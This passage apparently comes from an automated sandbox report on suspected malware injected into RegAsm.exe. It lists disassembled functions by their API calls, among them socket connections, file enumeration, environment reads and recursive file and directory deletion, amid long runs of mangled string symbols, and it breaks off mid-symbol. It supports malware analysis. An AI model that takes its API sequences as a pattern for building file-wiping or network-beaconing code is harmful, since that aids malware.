DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$
char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocato
r@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_str
ing@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@AB
V01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,5_2_0040751B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@